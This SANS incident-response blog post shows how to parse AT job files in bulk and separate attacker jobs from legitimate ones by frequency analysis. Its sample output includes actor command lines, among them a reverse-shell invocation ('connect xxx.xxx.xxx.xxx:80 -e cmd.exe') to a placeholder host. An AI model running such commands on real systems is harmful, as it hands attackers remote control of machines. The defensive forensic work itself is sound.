SANS Digital Forensics and Incident Response Blog

Mass Triage Part 3: Processing Returned Files - At Jobs

Our story so far...
Frank, working with Hermes, another security analyst, goes to work to review the tens of thousands of files retrieved by FRAC. They start off by reviewing the returned AT jobs.

AT Job Used by Actors

AT jobs are scheduled tasks created using the at.exe command. At jobs take the filename format of at#.job, where # represents an increasing counter (e.g. at1.job or at42.job). They are used by actors for lateral movement and/or execution of their tools on a machine. The AT jobs will run as the SYSTEM user thus giving the actor access needed for their tools to run. The jobs can be scheduled remotely, too. There are plenty of articles on how AT jobs are used by actors. If you are unfamiliar with how AT jobs are created, please see Microsoft's web site at: https://support.microsoft.com/en-us/help/313565/how-to-use-the-at-command-to-schedule-tasks

I'll show some example actor AT jobs later in the blog post.

AT Job Analysis

Out of all the files that will get reviewed, AT job analysis takes the least amount of time. Thousands of jobs can be reviewed quickly using frequency analysis. Frequency analysis is where lines of tool output is sorted, counted, and reduced via the uniq command. Using frequency analysis an analyst can usually determine as normal or legitimate those lines with higher frequency counts. For example, let's say that you have 1000 machines and all 1000 machines have the same AT job. Chances are that AT job will be legitimate. APT AT jobs are usually on a smaller set of machines. Let get into how to process the AT jobs and some example output.

To process the AT jobs here are the steps:

  1. find . -name "at*job" -print -exec jobparser.py -f {} \; > {output file from step 1}
  2. grep Parameters {output file from step 1} | cut -d: -f 2- | sort | uniq -c | sort -h > {review filename}.txt

After running the AT jobs through Jamie Levy's jobparser.py (https://raw.githubusercontent.com/gleeda/misc-scripts/master/misc_python/jobparser.py), the primary line in the output that needs to be reviewed is the Parameters line. Below is example output from a single AT job from the output file from Step 1:

./machine13/At2.job
Product Info: Windows 7
File Version: 1
UUID: {260A6E48-9D8E-46C1-9511-12414604B249}
Maximum Run Time: 72:00:00.0 (HH:MM:SS.MS)
Exit Code: 1
Status: Task is ready to run
Flags: TASK_FLAG_DONT_START_IF_ON_BATTERIES
Date Run: Tuesday Oct 20 08:16:00.123 2015
Running Instances: 0
Application: cmd.exe
Parameters: /c start.vbs
Working Directory: Working Directory not set
User: SYSTEM
Comment: Created by NetScheduleJobAdd.
Scheduled Date: Oct 20 08:16:00.0 2015

Note the "Parameters" line in bold. This is the line that can be used to key off of for doing a mass file review. While the other data is interesting and useful, the "Parameters" line can be used to help identify which jobs the analysts needs to take a closer look at.

Step 2 Output:

1 /C "C:\xcf\bin\purgeold.bat 30"
1 /C "C:\xcf\bin\CCleanup.bat 4g"
1 /c c:\users\fred\ab.exe>thumbs.dll
1 /c "wde.exe >1.dll"
1 /c wde.exe>1.dll:
1 /c wde.exe>1.dlL
1 /c wde.exe>1.dlL'
1 /c wde.exe>>1.dLL
1 /C "pushd C:\xcf\hist && C:\xcf\bin\purgelog *.hst 7 >hstpurge.log"
1 /c "ght.exe -x>1.dll"
1 /c "ght -x>2.dll"
3 /c "start c:\users\admin\appdata\local\temp\vc connect xxx.xxx.xxx.xxx:80 -e cmd.exe -v"
4 /c system.bat
8 /c "taskkill /f /im wscript.exe"
10 /c wde.exe>1.dll
11 /c start.vbs
200 /C "C:\Program Files\Cisco Systems\CTIOSServer\purgeold.bat 30"

Can you spot the badness? Nearly everything in the list is bad. The only lines that are not bad are the ones ending in "purgeold.bat 30", "CCleanup.bat 4g", and "hstpurge.log". The other jobs listed in the above output are APT related. To briefly discuss the columns above in the output. The number (first column) represents that number of lines found in the "{review filename}.txt" file. For example:

11 /c start.vbs

There were 11 AT jobs that ran "/c start.vbs".

Next Steps

As I go through the Step 2 output file, I typically will put an identifier, such as "#km ", at the end of the line so that I can grep my identifier out later for the lines I find interesting. Then to trace it back to the AT job file by searching the output file from Step 1 for the lines identified as interesting and review the rest of the AT job details. See the example AT job ./machine13/At2.job from above.

Note that due to the "-print" option given to the find command it prints out the directory path and file name for AT job before showing the jobparser.py's output. If FRAC/RIFT was used, the hostname of machine where the AT job came from will be in the directory path. Depending on the contents of the AT job, the machine may require further triage or a deeper analysis.

The parsed AT jobs above show the following tools used by the actor:

  • wde.exe
  • ght.exe
  • c:\users\admin\appdata\local\temp\vc
  • system.bat
  • taskkill
  • start.vbs

One of the tasks the analysts needs to do next is track down these tools and review them. Per the list there was only one tool with a full path. FRAC could be used to search the entire network for these tools. A custom getfileslist.txt could be written to gather up these tools. The following is some example lines to that for the getfileslist.txt file:

  • wde.exe$
  • ght.exe$
  • system.bat$
  • start.vbs$
  • \/users\/admin\/appdata\/local\/temp\/vc*

Note that "taskkill" was not added. The "taskkill" binary is part of the Windows OS. It doesn't make sense to pull these back as every system will have it. However, the analyst should work with the administrators to determine if the use of "taskkill" was part of administrator activities.

Lastly, the date run and scheduled date fields for determined actor AT jobs, should be added to the incident time line. These dates and times can be used to for time line analysis of the system where the AT jobs were scheduled. Also, the dates and times may useful for log analysis and network forensics.

Next in Part 4

In Part 4, I will discuss processing the ShimCache from the SYSTEM hives that were collected using FRAC with regards to mass triage.

 

Keven Murphy works for the RSA Incident Response team working on APT to commodity incidents.

Post a Comment






Captcha


* Indicates a required field.